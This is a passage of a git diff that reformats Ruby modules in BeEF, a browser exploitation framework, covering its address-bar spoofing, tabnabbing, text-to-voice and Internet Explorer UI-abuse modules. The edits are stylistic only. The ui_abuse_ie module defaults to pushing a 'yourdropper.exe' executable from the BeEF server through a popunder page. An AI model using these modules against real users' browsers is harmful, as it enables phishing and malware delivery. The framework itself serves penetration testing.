'result' => @datastore['result'] }) + end end diff --git a/modules/social_engineering/spoof_addressbar_data/module.rb b/modules/social_engineering/spoof_addressbar_data/module.rb index f58ee27d7..6d69e2ee0 100644 --- a/modules/social_engineering/spoof_addressbar_data/module.rb +++ b/modules/social_engineering/spoof_addressbar_data/module.rb @@ -4,15 +4,14 @@ # See the file 'doc/COPYING' for copying permission # class Spoof_addressbar_data < BeEF::Core::Command - def self.options [ - {'name' => 'spoofed_url', 'ui_label' => 'Spoofed URL', 'type' => 'text', 'value' => 'https://example.com/'}, - {'name' => 'real_url', 'ui_label' => 'Real URL', 'type' => 'text', 'value' => 'https://example.com/'} + { 'name' => 'spoofed_url', 'ui_label' => 'Spoofed URL', 'type' => 'text', 'value' => 'https://example.com/' }, + { 'name' => 'real_url', 'ui_label' => 'Real URL', 'type' => 'text', 'value' => 'https://example.com/' } ] end def post_execute - save({'result' => @datastore['result']}) + save({ 'result' => @datastore['result'] }) end end diff --git a/modules/social_engineering/tabnabbing/module.rb b/modules/social_engineering/tabnabbing/module.rb index f67f2ba98..c36d76834 100644 --- a/modules/social_engineering/tabnabbing/module.rb +++ b/modules/social_engineering/tabnabbing/module.rb @@ -4,21 +4,19 @@ # See the file 'doc/COPYING' for copying permission # class Tabnabbing < BeEF::Core::Command - - def self.options - configuration = BeEF::Core::Configuration.instance - proto = configuration.get("beef.http.https.enable") == true ? "https" : "http" - uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/basic.html" - return [ - { 'name' => 'url', 'description' => 'Redirect URL', 'ui_label' => 'URL', 'value' => uri, 'width'=>'400px' }, - { 'name' => 'wait', 'description' => 'Wait (minutes)', 'ui_label' => 'Wait (minutes)', 'value' => '15', 'width'=>'150px' } - ] - end + def self.options + configuration = BeEF::Core::Configuration.instance + proto = configuration.get('beef.http.https.enable') == true ? 'https' : 'http' + uri = "#{proto}://#{configuration.get('beef.http.host')}:#{configuration.get('beef.http.port')}/demos/basic.html" + [ + { 'name' => 'url', 'description' => 'Redirect URL', 'ui_label' => 'URL', 'value' => uri, 'width' => '400px' }, + { 'name' => 'wait', 'description' => 'Wait (minutes)', 'ui_label' => 'Wait (minutes)', 'value' => '15', 'width' => '150px' } + ] + end - def post_execute - content = {} - content['tabnab'] = @datastore['tabnab'] - save content - end - + def post_execute + content = {} + content['tabnab'] = @datastore['tabnab'] + save content + end end diff --git a/modules/social_engineering/text_to_voice/module.rb b/modules/social_engineering/text_to_voice/module.rb index 4d4735a7f..d94c86ed1 100644 --- a/modules/social_engineering/text_to_voice/module.rb +++ b/modules/social_engineering/text_to_voice/module.rb @@ -4,18 +4,17 @@ # See the file 'doc/COPYING' for copying permission # class Text_to_voice < BeEF::Core::Command - require "espeak" + require 'espeak' include ESpeak def pre_send - # Ensure lame and espeak are installed - if IO.popen(['which', 'lame'], 'r').read.to_s.eql?('') - print_error("[Text to Voice] Lame is not in $PATH (apt-get install lame)") + if IO.popen(%w[which lame], 'r').read.to_s.eql?('') + print_error('[Text to Voice] Lame is not in $PATH (apt-get install lame)') return end - if IO.popen(['which', 'espeak'], 'r').read.to_s.eql?('') - print_error("[Text to Voice] eSpeak is not in $PATH (apt-get install espeak)") + if IO.popen(%w[which espeak], 'r').read.to_s.eql?('') + print_error('[Text to Voice] eSpeak is not in $PATH (apt-get install espeak)') return end @@ -26,9 +25,9 @@ class Text_to_voice < BeEF::Core::Command message = input['value'] if input['name'] == 'message' language = input['value'] if input['name'] == 'language' end - unless Voice.all.map { |v| v.language }.include?(language) + unless Voice.all.map(&:language).include?(language) print_error("[Text to Voice] Language '#{language}' is not supported") - print_more("Supported languages: #{Voice.all.map { |v| v.language }.join(',')}") + print_more("Supported languages: #{Voice.all.map(&:language).join(',')}") return end @@ -37,7 +36,7 @@ class Text_to_voice < BeEF::Core::Command msg = Speech.new(message.to_s, voice: language) mp3_path = "modules/social_engineering/text_to_voice/mp3/msg-#{@command_id}.mp3" msg.save(mp3_path) - rescue => e + rescue StandardError => e print_error("[Text to Voice] Could not create mp3: #{e.message}") return end @@ -46,29 +45,30 @@ class Text_to_voice < BeEF::Core::Command BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind( "/#{mp3_path}", "/objects/msg-#{@command_id}", - 'mp3') - end - - def self.options - return [ - { 'name' => 'message', - 'description' => 'Text to read', - 'type' => 'textarea', - 'ui_label' => 'Text', - 'value' => 'Hello; from beef', - 'width' => '400px' }, - { 'name' => 'language', - 'description' => 'Language', - 'type' => 'text', - 'ui_label' => 'Language', - 'value' => 'en' }] + 'mp3' + ) end - def post_execute + def self.options + [ + { 'name' => 'message', + 'description' => 'Text to read', + 'type' => 'textarea', + 'ui_label' => 'Text', + 'value' => 'Hello; from beef', + 'width' => '400px' }, + { 'name' => 'language', + 'description' => 'Language', + 'type' => 'text', + 'ui_label' => 'Language', + 'value' => 'en' } + ] + end + + def post_execute content = {} - content['result'] = @datastore['result'] - save content + content['result'] = @datastore['result'] + save content BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind("/objects/msg-#{@command_id}.mp3") end - end diff --git a/modules/social_engineering/ui_abuse_ie/module.rb b/modules/social_engineering/ui_abuse_ie/module.rb index 67e8a2153..66f868c57 100644 --- a/modules/social_engineering/ui_abuse_ie/module.rb +++ b/modules/social_engineering/ui_abuse_ie/module.rb @@ -9,35 +9,27 @@ # For more information see: https://sites.google.com/site/tentacoloviola/ ################################################################################ class Ui_abuse_ie < BeEF::Core::Command - - def self.options - return [ - {'name' => 'exe_url', 'ui_label' => 'Executable URL (MUST be signed)', 'value' => 'http://beef_server:beef_port/yourdropper.exe'} - ] + def self.options + [ + { 'name' => 'exe_url', 'ui_label' => 'Executable URL (MUST be signed)', 'value' => 'http://beef_server:beef_port/yourdropper.exe' } + ] end def pre_send - begin - - @datastore.each do |input| - if input['name'] == "exe_url" - @exe_url = input['value'] - end - end - - popunder = File.read("#{$root_dir}/modules/social_engineering/ui_abuse_ie/popunder.html") - body = popunder.gsub("__URL_PLACEHOLDER__", @exe_url) - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw('200', {'Content-Type'=>'text/html'}, body, "/underpop.html", -1) - rescue => e - print_error "Something went wrong executing Ui_abuse_ie::pre_send, exception: #{e.message}" + @datastore.each do |input| + @exe_url = input['value'] if input['name'] == 'exe_url' end + + popunder = File.read("#{$root_dir}/modules/social_engineering/ui_abuse_ie/popunder.html") + body = popunder.gsub('__URL_PLACEHOLDER__', @exe_url) + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw('200', { 'Content-Type' => 'text/html' }, body, '/underpop.html', -1) + rescue StandardError => e + print_error "Something went wrong executing Ui_abuse_ie::pre_send, exception: #{e.message}" end - def post_execute - content = {} - content['results'] = @datastore['results'] - save content - end - + def post_execute + content = {} + content['results'] = @datastore['results'] + save content + end end -